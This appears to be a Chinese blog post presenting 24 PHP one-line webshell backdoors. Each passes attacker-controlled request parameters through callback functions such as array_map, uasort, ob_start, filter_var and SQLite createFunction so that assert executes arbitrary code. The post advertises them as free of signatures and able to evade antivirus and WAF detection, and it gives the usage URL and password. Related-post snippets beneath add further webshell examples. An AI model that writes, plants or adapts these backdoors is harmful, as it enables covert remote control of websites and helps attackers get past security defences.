一些无特征PHP一句话

最新推荐文章于 2024-03-16 18:00:00 发布
最新推荐文章于 2024-03-16 18:00:00 发布
阅读量1.4k 收藏
点赞数
分类专栏: 笔记
不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)
原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是:
http:// target/shell.php?e=assert 密码pass

01
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, $e);
02
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map($e, $arr);
03
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, $e);
04
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);
05
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');
06
$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));
$arr->uksort('assert');
07
$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['pass']);
08
$e = $_REQUEST['e'];
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);
09
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk($arr, $e, '');
10
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
11
mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');
12
echo preg_filter('|.*|e', $_REQUEST['pass'], '');
13
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();
14
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
15
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function($e, $_REQUEST['pass']);
16
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
17
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
18
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
19
$e = $_REQUEST['e'];
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
$stmt->execute();
20
$str = urlencode($_REQUEST['pass']);
$yaml = <<<EOD
greeting: !{$str} "|.+|e"
EOD;
$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));
21
$mem = new Memcache();
$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
$mem->connect($_REQUEST['pass'], 11211, 0);
22
preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);
23
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);
24
$iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST['pass'],)), create_function('$a', 'assert($a);'));
foreach ($iterator as $item) {echo $item;}
ccstuck
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php一句cmdshell新型 (非一句木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
eval与assert一句木马分析
weixin_49472648的博客
07-23 2458
利用文件上传漏洞,往目标网站中上传一句木马,然后你就可以在本地通过蚁剑等webshell工具即可获取和控制整个网站目录。 一般的php一句后门很容易被网站防火墙waf拦截,而waf通常通过判断关键字来辨别一句木马,要想绕过waf就需要对木马进行一些变形。............
红队免杀,一句木马的套路
zxcvbnmasdflzl的博客
05-25 605
红队免杀,一句木马的套路
渗透干货|史上最全一句木马
最新发布
2201_75362610的博客
03-16 1123
/可执行命令一句密码-7ASPX一句的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp原来代码是 把标签修改替换下来 为execute request(“cmd”) 这样就避开了符号!表中数据段限制,一句木马也写不下的情况网络中流传的最小的木马代码是 如过连这也写不下怎么办?
php assert eval,代码执行函数之一句木马
weixin_28864249的博客
03-23 2019
前言大家好,我是阿里斯,一名IT行业小白。非常抱歉,昨天的内容出现瑕疵比较多,今天重新整理后再次发出,修改并添加了细节,另增加了常见的命令执行函数如果哪里不足,还请各位表哥指出。eval和assert的区别eval特点eval()会把字符串按照php代码来执行(合法的php代码,以分号结尾)eval()是一个语言构造器,不能被可变函数调用eval($_REQUEST[1]); #eval一句...
eval与assert执行一句木马
C_LCH_2000的博客
07-24 2048
eval函数中参数是字符,assert函数中参数为表达式 (或者为函数)
php特征一句,分享一些无特征PHP一句命令
weixin_35289035的博客
03-17 228
类别:Linux / 日期:2020-06-26 / 浏览:394 / 评论:0 分享一些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句。(少部分一句需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html所有一句使...
PHP隐形一句后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
今天一个客户的服务器频繁被写入一句后门,删除了还有,原来在程序中加入了如下代码,大家可以注意下base64_decode函数的参数。
pHp一句批量上传
08-29
pHp一句批量上传
php实现批量查询清除一句后门的代码
10-30
一句后门一般简单,容易隐藏危害大,查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句后门的代码,大家可以省去不少麻烦了
PHP一句 免杀版
10-23
PHP一句 免杀版
墨者 - WebShell代码分析溯源(第10题)
吃肉唐僧的博客
07-15 247
下载文件,找到木马文件 代码如下: <?php error_reporting(0); $e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST['GET']); ?> 这个是一句木马变种: 这里解释一下register_tick_function函数,这是每个tick上...
PHP的回调后门
feng的博客
10-17 879
前言 今天洪学长给我留个了任务,具体的就是关于回调后门这块的内容。我关于回调后门了解的很少很少,以前做南邮的题目遇到过一道三参数回调后门的题目,当时草草了解了一下,理解的不算很深。因此今天去学习了一下回调后门的相关内容。 PHP的回调函数 什么是回调函数? 所谓的回调函数,就是指调用函数时并不是向函数中传递一个标准的变量作为参数,而是将另一个函数作为参数传递到调用的函数中,这个作为参数的函数就是回调函数。通俗的来说,回调函数也是一个我们定义的函数,但是不是我们直接来调用的,而是通过另一个函数来调用的,这个函
PHP不包括字母,数字和下划线的webshell
酉酉的博客
10-27 1576
文章目录前言知识铺垫PHP中异或(^)概念PHP取反(~)概念不用数字构造数字用字符串自增,获取字符webshellphp5和7的差异。不用数字和字母的 shell非字母、数字的字符异或出字母非字母、数字的字符取反出字母php 递增/递减运算符实例payload不包括数字,字母和下划线的shell实例payload 前言 膜拜下phithon师傅 一些不包含数字和字母的webshell 另...
PHP特征webshell
zzgslh的博客
04-03 714
PHP特征webshell webshell就是将php、asp代码以网页的形式,编写成命令、代码执行的环境,可用于作为网站后门。webshell形式可谓是千变万化,但是总会存在一些文件和代码特征,从而可能被杀毒软件查杀,但是我们如何能做到无文件、无特征,来规避杀毒软件的查杀和检测呢? 常见php代码种可执行命令函数: eval()、assert()、preg_replace()、creat...
php 留言板 木马_PHP一句木马研究
weixin_33365844的博客
03-09 380
*本文原创作者:Gxian,本文属于FreeBuf原创奖励计划,未经许可禁止转载最近在研究PHP一句后门,查阅了很多大佬的博客,并从中衍生出了一些可用的方法。现总结如下:方案一:回调函数回调函数:Callback (即call then back 被主函数调用运算后会返回主函数),是指通过函数参数传递到其它代码的,某一块可执行代码的引用。已被D盾查杀的函数:array_filter()array...
特征隐藏php一句,php一句cmdshell新型 (非一句木马)
weixin_42476987的博客
04-16 319
复制代码代码如下:/*一个新型的php一句cmdshell(非一句木马)//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);//局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码;//writebyskyfire*/echo`$_REQUES...
特征隐藏php一句,【转】超级隐蔽的PHP一句后门
weixin_39830387的博客
04-16 351
我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。强悍的PHP一句后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句木马。利用404页面隐藏PHP小马:010203404 Not Found0405Not Found06The re...
php一句木马图片马
01-30
根据提供的引用内容,PHP一句木马是一种利用PHP语言特性的恶意代码,它可以在服务器上执行命令并返回结果。而图片马是一种将恶意代码嵌入到图片文件中的攻击方式。下面是一个示例,展示了如何在PHP一句木马中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值